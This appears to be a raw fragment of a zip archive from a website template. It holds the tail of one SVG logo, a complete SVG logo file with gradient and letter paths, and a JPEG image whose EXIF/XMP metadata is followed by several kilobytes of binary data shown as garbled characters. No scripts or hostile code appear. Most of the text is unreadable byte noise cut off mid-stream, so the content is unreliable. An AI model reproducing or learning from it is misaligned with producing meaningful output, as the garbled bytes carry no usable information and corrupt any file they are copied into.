		c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"/>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7
		c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"/>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7
		c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4
		c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8
		s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"/>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7
		c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4
		c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8
		s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"/>
</g>
</svg>
PK�8FZ*&�}images/logo.svgnu�[���<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 22.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
<svg version="1.1" id="Layer_3" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#1B1D21;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop  offset="0" style="stop-color:#FFD797"/>
	<stop  offset="1" style="stop-color:#FF8523"/>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1
	s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0
	c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2
	c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4
	c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2
	c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4
	c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4
	c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1
	c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2
	c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2
	c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6
	c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7
	c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1
	c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5
	C40.4,20.6,40.4,20.5,40.4,20.3z"/>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5
		c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3
		c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1
		c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3
		c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"/>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3
		c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2
		c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3
		c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"/>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19
		C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9
		c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z
		 M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7
		C88.8,5.7,89.1,5.5,89.5,5.5z"/>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1
		c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2
		c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7
		c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1
		c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5
		c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"/>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7
		c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"/>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7
		c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4
		c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8
		s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"/>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7
		c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4
		c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8
		s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"/>
</g>
</svg>
PK�8FZcb_š�images/image-box-1.jpgnu�[������ExifII*��Ducky6���http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:01801174072068118DBB8F711C24FFAB" xmpMM:DocumentID="xmp.did:28695753DC7011EA82E0E4F561590FAF" xmpMM:InstanceID="xmp.iid:28695752DC7011EA82E0E4F561590FAF" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3103a096-de18-5c4c-9991-05ec876bfece" stRef:documentID="adobe:docid:photoshop:fff8ae06-d55a-aa4b-aec7-cb339c96d99b"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��Adobed����		  ##########
#################################################���g���!1AQ"aq��2��B#�Rbr��Ⴂ3C$�Ss��c��4D�Tҳ�%'!1AQaq�"2��B��3�#R��br�c$��?���˹�X��hdnmk'q���M���T�G1򧌖�{q��]@L���#�f��J�?�Ó���U.Ei|���)e����
���q�B�q�w7{v�=5T㌁��~�5KxYT�k�Ge�y�2 G{p�T
�d��a�$HVD8�N���s��"�P%�(�A|�����:��1�3�Ž5�Ȇ�MGg}�D�恖��QyRHù�t�ȑA�P1e�dF�sjG�i�A"��e�b!q�Z�S����#�I��3 
׹R�m#�����
.�(��9�Ű��VR.���aրK�(�ׅ��;/vk���A�)��	H��bq�YS���eT8�sʒ�l>FS��\��z)x���	�gF��[Z��q4
I�6B���9Dq�`x;h�����Vĝu�M���qA&+.T�Lei�2bP.�'�.f����@�|�Q�$,	H�nK��嶟��j4�,i�.L.ѻ-�HI	�5e�����L�j��~`�ԫ#9�n1��w�[~9�e$KI���@��2�D9���ވ�D�I,��ޢ�sl��lQ@��Z�{"���j�i�=����)�O.�o����&�x�*����#��װ���E��$�r_U�>��~7B�@O�wP&���A�-����P@��P:�}v������P�hM�:۶נ�q�zhO�!��-D!����g��N��UBN���@D��H��q�+�@�I�Qm8�W��I��Џ�U	7�4�mP$�w�U
��(.��\v���ڍmk_���{v}�
�����@��A��@b��/oU�dz��8����48��_G��
�߻�����?��=�[om�s�G��;p᭽t1���\���Q�>��t�{�߅i��?/s���Fh@'�y�j(�1�琦\6Wmn�ll{
��nBK$,с�r�E�����m;(�S�|���ȳ�̺_����S���	B��|��7.����:�F�i!\Y�����d�x��@������A(�K���ǚ�sB�9�d*�e^�uQA#��K���ܤ�j��PЊH��X3�הewzhW�;E�U1���yhe2bd��˸$x�ƁQ�R
�_Scv%O�<=�
��-L�0�2�7���TITȼ��d�a{�Xv^��x�Y�S�2�W@5�_��,?��VM$��YO1F�>��������&\�X(��~:UC��y`Μ���/{_U����=�4=�dN'�ւ\?베Xo�@`s'�!�ѕ���0ɐ�!nY3�%��7,ئ�=�����d��Ķ�W�^al��ca���I�'-�,�p|[OIJʚ�f�����CfU�X��-�G�Yk,)Vx�awf|�Iׇ�+U���7<���r��ͧ���6/!�R4�3��[��Z�ӛ�ƫ��D��U�=���l���q��>�!,O`�i�@��Oi�3{p��O�ۀ���>:q�luF�$j{
'MO��#N��MnM�}�ˀn�_N�<�E�������5Q#�V�A
b-s� ���H���r����=��7'���I�Ӎ4�֪����@�e���M}�5�I��D��}�
��QI<}�;�m�Q	װsU6�E
�������~¢�Չ$^�֢8z8�(�s�k����P6�a��(�pA�0{x�_��@���涔
�NS@w �v�
��}��ҠSq�vO
i}�k��;mAO��Y��;�*ȑ�I�mt#��:e4���T<\�Z�:� �;G��B�$g|,�����C�OoeT�$���!�D�! �s(��m�Q@L�M�;\�S��*�sw�{����c�g��t�?!6����P=���͸Bl9�g�����=�S��Rfc�UFv?��TW�-n�)-,1A���H��dG�J��z"&Ds�YPQ��|�`O)����<.K�d�..nU���$�D�Bb�p� -�F��UP�)����	�f�[��P9�M6L������c�`/���D*!(e9�y���@"�~���;4�@c|9UH]X�7�j"c�Hȇ���&D�-~f�TP�w��[�3b�H
���=�TY8�����bd]n��*��h#,�c�-~WÑ�f�h�C�h�C<\ܯ��a�lTFamH^��K�S�Ǎ�U+��v�Vm�v��h��.�RI�e#�nu��o�s���"�sh��a��jo�F���r�y\c)�� ^�!���Aϥb��S�{;c[�.lJ����ғ�{2qp�.�3,b��kLŦ /9b��30Q����[�.�R�l�n�]�}eV[�8�!��;�N[!�[��2l�}��T7��x'��@����I��ǍG�[}�������'���M��ݴ�B؛���I'�Jҁ��K}ע&
�z{���<��z�ej�˷Ŏ�ٻ�"�M�6��?}EC�t��c��x�+�a�mG�JH����zǤ�'���r�|/<�X?����&Qe����́�`�7�##[�d&��e+���!9?�<�À,K�@)�*��u��b�fM#Ii��������Y3I۹Lf�Cɋ�)�x$m�u1�є��gm}cR�/l�J���yYOF�{+*"OﶈI��o�^�#k��$�=��wP�aþ�I���E��{��P ވ@~��I֢H�6��M��m�����v�]�?����{k��;5�9����M��_���^í��)��wr�^��A���>����`�aki�0{��۳��`�m�@`�H����P&��8P�n���.&�?���v��<�6�{j��9�Ó!�C��-���^�P��d}�E��]W��>+���TC����'�_���E������8��,�o��o#�)��@�\RI���� �9pAfkkn^�is�v�
4M�X��~'+�(q�0RK��ĭ�yd�S�֠c��gF��	�F�H^Q~��AL�\)��K��:�i�TC$�ŏ!�G/#�H�_���曛;�lD��M|>��y1��Xˀ��{�?ꚡ0Ʊ�c���42�d66=�,5&�9Cr��?,R�a���=��*�?��#l��+I'�7�ME,C&C�X��ʏ�'g�t��&�X	���_2my^OP��h�.|�x�22�U�ʮ<W�۲�@d�!��n�����������+��"11_1@���KX�U�2>�7$�Q�:P;�H��$���-
��#-l	a�����;1X�Ԥ�����Ӵ�t�T��%�HtF�.Ux����Vj�;�Ub� �\�c�	�rm{RC
��X�f�oD�\E���E�R���6�i6����M��TU���W�Ơ���J�{ �q�8w�2l�kp]{*��o�@�/};�����m
��v ,~��
��&�2�\9{F-���PR`G3fn8x��p�(

]ӣ����+���M*ᜠOֽ'	#o�˷��L#��U�2�/�y����a�$(dY.M�P2��ufH#��*�?�)��2�]�-����3	wc�j�2�T
@(���7h:��yp2c�mx��9��z��ݠw�Bl,	4���hoO��u$��z�o��@�s{�o
_�_W
 �i���@����k��@��T6A'N�^��i"���QW�����W
{,p��(;���@v���ƁZ��Ԏ4
�ia�5�ƀ�:�q�;�	﷣��}�������︱�@�k��@�����
���x�s>��¨'��s���l[O�m@�:�|��t�\�g�Fes.�;mz%)Lo��<���V�X�ֲ�`S��c�֜:�/�T��E��.q�NgX�V+�wU���}��L�,�>��9����Ge��X^�<��-�XYIm�#͔�����AƁ�|��H�̇��E�\�݄�
㧖�|�J����������n���$ǑB�7v�|+s��ҁ�t���ʓB%�����װVu�\	�PK�FA�r�u>nE�d(�3����
���3��|�ɜ&B�{�G�C�&cO�<� yR�@?�pj��~?Ou��&CI�7���<��H�S�~5y��2��x�DA�'��ʰ���R�!�M`};�]Ԥ���k4~\�3�8hښ���^=�t����S��&�"̋7�$ţ��Y���Y��ˏ���~���3qR6uVX�t瘟�0��͖�9
��G��YTh��$L\�y���C.b,�����u��IHb(�LUf�>M���XݪÓ�X�eA���!G�� �֢�aM!^X�'�ip
F�-�V2�~���BL|����4�g�X����(An�]M�E�#+܏�i��7�-�F������,A�l5�*�ݷqȋ��b�|e�?�#JӞ��S_/?k�L��R�e_.����ofS�{��P��~��'/9�,�1O%���U�}Je?�v|H�du27���52���չ�g�d���*��ʗ/{���+6i��;U��I7&��@��P
A7e�3�X7��D�=�(/�>�u�Ip�K��� Ȗ8�Q��sr����48Ew n�>;�I���{6�؋���E��W`H<٦�ː�H:���<ïg������:sk��<xI��Dѿ4��~O4�9�[];+R[�B�v�����	��hn?�o�¹��[Am/��_W�J�E���𪄑of��@;n�ݖ�I��@��P6A�{oUA����H���ÏeL=ǍP�:�����E]�_A=��F�}������~<�B�t��
8vz*������@�g/�h�_��(}}#���[�h�ֽ��n�=>�
�s�1dT���A�,���<5���䅷��d|�Ap����]O1<5����ێ�e�C�~nN�5S%�7�]f�MC�(��{4:ڊk�?�&w���&pO#{v_��D���M�|9�Ѝ{�e�q:1�Y*���q��&"�j���#C",8Y�  ��d��t4
,'*nu�_9Xn`(�`�*ufal%�5!�q*x�(D��)�RDn�Hż,��[v��x�)�<�d*u6'����������{�90a�a��K70@mk���{�4�Һ�vͶ4n-�ِ�#���;���״�����0�A`p
�-Xˤ����$���cʣ�]5��C�}Tq!lLw��0��V����1��?�c��ɑ��ɔ�L2�����k\\�]z�����<T�ZH�8��L���9Jڼw}�6�ݯ�ӏN�1��,�yli�7�T�k�p���T$p�9|�)<ؕ����J�q����Ip��ȉTx�E���q��'\�$�2d�T\��$#���=�0��J�,x�,L�hVZ�������������f����Y���0*9
�o�
J�f��#�3'�i���mh�?��.�1�};����ی���a<I+^5�"�&:�ޞÅ�836�I��O�#�_V�9c�\e<j���W�'��/~޲��s���7s�*�2���y��cēsU@(��qC4��m#�
�X���A���c��d������L�}]=�T��Jx����A��
Ќ5�p�^O�ń/��'��a�!�l0�6,�ET�T��<�S+��X�����۱�~�i,��;W~?m˿��k�8��ǯ}���nw�ˍ.0�ib�7XG��a�yK�����k��u�ןo�qN����:�c�˓+i�r��1�"Ggcj"!t�F��_�i?w'��9_�mn�֠�M�$a+�yh���9���{m}6��q����澺�)�:�|˿��+���G�+��I�8���q����o�v��r��	�<�%b��75��u��{��{㯍�N����M����S��w�^�f�aBxA�$C��E��)�{wnvY��w�7�
��[��M��
!&����	o�ց%O���@�	��4	#A뿲�"=7���	����K�#���MQ{��msó����O-m}����(��7��P*��x���Q�
����Dۏu�P��K���<�(��������@gQs��PCkI����a��
�[�����k�X7�L��T�'���`3�,��R���� ��cR7(<�@ězj�X�'n���4f>V$�
����I�l�ǐ�?_�eoM�2���P9<s�l��3�f7%{O����;��l��Lr�I�5-���=�T368���^)D���>&�Kz�$K
�H*�����`?{�TTL6�F7����3՘>��=9�)�\��C��8��<���g��mɎ��^,wm��/��d�1����㘐8q�^M��SX�fH��G]���Y՝��co
�_��>۽:���B�>���"�_Q`��"��ﻷ
b7��r��
��Tp��+���|�Y�{�g���b X�����zYj�ouv[g*,cu`�8Q�^�^�oË�����x�����e���|8��de���I�W��#��E�2:A��2G�r~��<������6�3")'c+���O�W�}N��T�SNj�X"T���|beI�ԽA���g���B8��W���wswbǽ�?}T&�P
@(4;��0\�#$�(���Pi0��u�U����dʑ�v��
�9��<����}��L�=++'34��)�uY���~��
�m�yu�̓�o�u�E]e۷R�;�LIқr��O@iˇ��j�^�>�Ϸm/�����qk�h���n�8���vT��z�/-��]����S���}E�ۂ��0X��9�Y���g(���~ۏ�'.o�~*�sϼΚb|��������ܗ�Ʌ�.E[8�ׁ�W��|�]t��O?��<zͶ�K�2���Sǁ�nrϳ4j�nX�p�ܞY�5V�+�7-���������/��>_,����U���W��`��3*��t��Js~[�w���.��\���ى����=v���O��5�9&�"%<L҂�œƼ{{��^_I��N�ۖ�c�٢��*w�I��zB>���4��[~���u�[z�?(��#�[1��q�4��AX���Ǔ�f��Y���i�m��٤�龝����8�+|�����r��m��?���s���Y3C&-���]Υ>�my�헆r��*lw���oZ�GF�|-�"t��G���?x�mݩ�|E�=u�"��OuM��o~BOn��P���j)'��{
�q���'����h��׿�;(aoGp�4B����P ���������A�Nˊ*���[_N��;v��D�����4
���{����mcmA�hm���P�h
��@5����@:���P&��4�P]��{��SC6t^cHc����MyX�$�J苝�E.υ"㷚��4��j�s0����� �Y��L�
f&�/*�<	��5&��)�.�x2���c����	�1>�&:���D�=�m���o�QQe�&���/#�8�$�V[�C�-��ᑤ�7���6�N,X�E�	dG.�ăv:�yXsQuB>����
�W �H^k�E��Uu��}��|�c b���5˗ltu����&��Hl�i�>]�C$;�:S�<T�J�Ĵ�L���fչ�o�P�L|���IB���t����r��:��Tzq�P��>t }���۬�|_ct����8д����p�m=���|�p���D�u�<~^:Ŋ�聜�i��������{�Kۢ�}�s�$͗#��s=º�=gh�6�w��7&��[s�AZ�P
@f���'%�1�y��cR�ܠ�_�}<�\�6@F�r����yh4x_Dz�b^F&�<�f%a��h������%���4*���f��4�_Iz|	2��|�����9�b�k?D��C݄�R6}�������v���ܺk�����{C�&�{~�!}�����q��>����:�������.�O�M'�A�kק��-��m���Uyw�Kq�\w#�O�^�>��;ݶ�O���^K�H��߷����>g��T{����v�w�{ͷ}�i&D��ZyOb#}�5����6ڮ�z/��B�>ӑ�	%_)=d�V�����N���隣�۶���%�ʟ7��}ы}����<S����zt�O%�dj�~�d�4x�}G��� �81Ua@��1,���wk���7��W���m5���'âv/Ӿ��a#�d�Y�˙�-��Eco�s^����F���l���ٶ`�L,|e<����s}�����ݵ����z��H����1kp��r��$�Di&�\�!Ln|9�l�o��ʶ�{��aj(�6�uo� ���~�`/랠��#Μ�S�q�5�)���B��LWa�ѲH>�k;5�Un��ߍaH��<J
����T$�ٯi׍���DGgo��M��wm��P&�Z�7
��aÿ����oe�/����n�E[ؓp8��
LJ
~�!V#Oa�Pw��j�g~��R��=��.
�:5����ڟ�m@�57��(_M8p����(����(������K��IJ��"�P+D���Z����#�/�Xq�"s� >��7y���LX�
�b��	��/70��B}'Cj��J�-�
�$���<�B;��&�(#�f�?�g��n��C�	��VsǰQH��}�
�,b*�Gn^[���;���L���"C�L#�X����]*� �1؂�C9��	�a&��_Нw�&L�)��Id��� ��u[q2�uw<��À8c^T�
,+Ž�դ��o"<,��)�pq����m�jq��ַɷ�����U�L�L�#”��܀��7��l�G��Z��f��13�I):�w'�5�2kKi@(6�Ij���@,h��8�Z�t�Qn-�+"�
B��֠��}묠�dž���fD?¥�����k�x�/�Lx�S�O�
&�N���&l��ڥ�%�F	�h4��R�N$e5e�1���1��۩zw��G�[z�E�@����@�O��߶��w
�����ܟ�;J���
�ܨ>�M{4�75�����ӊv�Ud}D�k�l(��i�>��f�c����y����Uyc�S�����������
}<�����|׵��S���>�92K��1i�f�ߏO۬��˷?&����� bbːI��cg��5��u�Y?6u��n���β��6:�6S�#��o�W���}�?N�V�n����?���sw|u�X��o}�~��o��'����zt�N��d^�$���̬�>%^HT�f�kǿ޹o��z��_�m^��?Ha����#~�G4��>��o�}��.�V�Ӌ^��8��\x��@!E�O�^M�۽���I;t,�Mɹ�5T�P
�M�W	�;�0�.�C�*,�u��R7�6<|�kĪ~ՠ��{[����y���>dl��5��.��a��=��И���˨��@����BH:[��U	*.EH�^4BJ��q�@�4��(T�_�\�DG��@�/��� �Xht���I��[A�5m����m���lA��ο��ES��
m@�����-�J [�����*9M�q4
����k����4p4�����t��d4��G�]:`���Omn6��/.�^k�d�\�`���-��.I$��dt1䯄�X���
����Q��;O��Y��~{Ǡ��n�z���2$����I�Z2ʼn]IbN��ښ	-4I��c(l>"K1VQ�#5�ӍEW�p0A)f�"��+�	'N�t���:g+z�s��5�Ŕ��)�Xش�_�{�UJ�5�����c�X0�*<�����!��˳|s*��,�֯�f����}��9�~��X�Q�YH�嘃�
��Α�]���+��OmP�ڀ@�>f[r���;p��A���N��
���E�����R��_E7�9�nテ#�*�rTv������?D�	c�rw���V*�D㈼��Pjp~��.!����~,������-KL.#��-�@���o�3WM8���&6��^�O��O[��'���{r����q����p�o�u�,��},��d����ܶ�������_ݾ�������ۭ��ή�^B�8q��^d���&�{�������8�}Û��OQo�7g�A�*܃ܖ�~�o�׶����o��+���!v��]��c�ׯ]f��k��wO��7�����N��L�y�_��r{�=?v�~n�{nM�J��a�2cņ��șC�'9��v�׵�}#է�o~��O��hs���	coޔ��^M��?�O������e�'�Β�Y�Nc�M�?� �}x���=�/�zt�o�鎛��8�N,n����Nc^NOw˿��g�_oǯmb�Y�y�������5�uȪ�@(�"�q6�#"���2I��
`ȹ���dD���
 PP���Xnj����a�M�4��	��L2���Pr��!�w��lb�&��8�K�gwK�.I�pGt��X��ͪe���K�wzh"��nBH7����MH��K^�+���"�E6Tv�h˭�8��(a�����G����KQVAM�4<=u�wz5�Q���ӥ��D�`��P[�}ZP();N��.[t����x��G`�a���#�@-a�;���{k���ú�ڊ����ݗ,Ѭ�HM�
/��w潴����76n|XĢ�\��[�y�oo�o���-�6�;
��(P��y���A��wi�^9�|�����{w4T6U�3�ԺI�u�kY�o��T�.ݐX"�eO��QZ���q��y9o)lM�K❁<�"�}u6�Žx��u��l
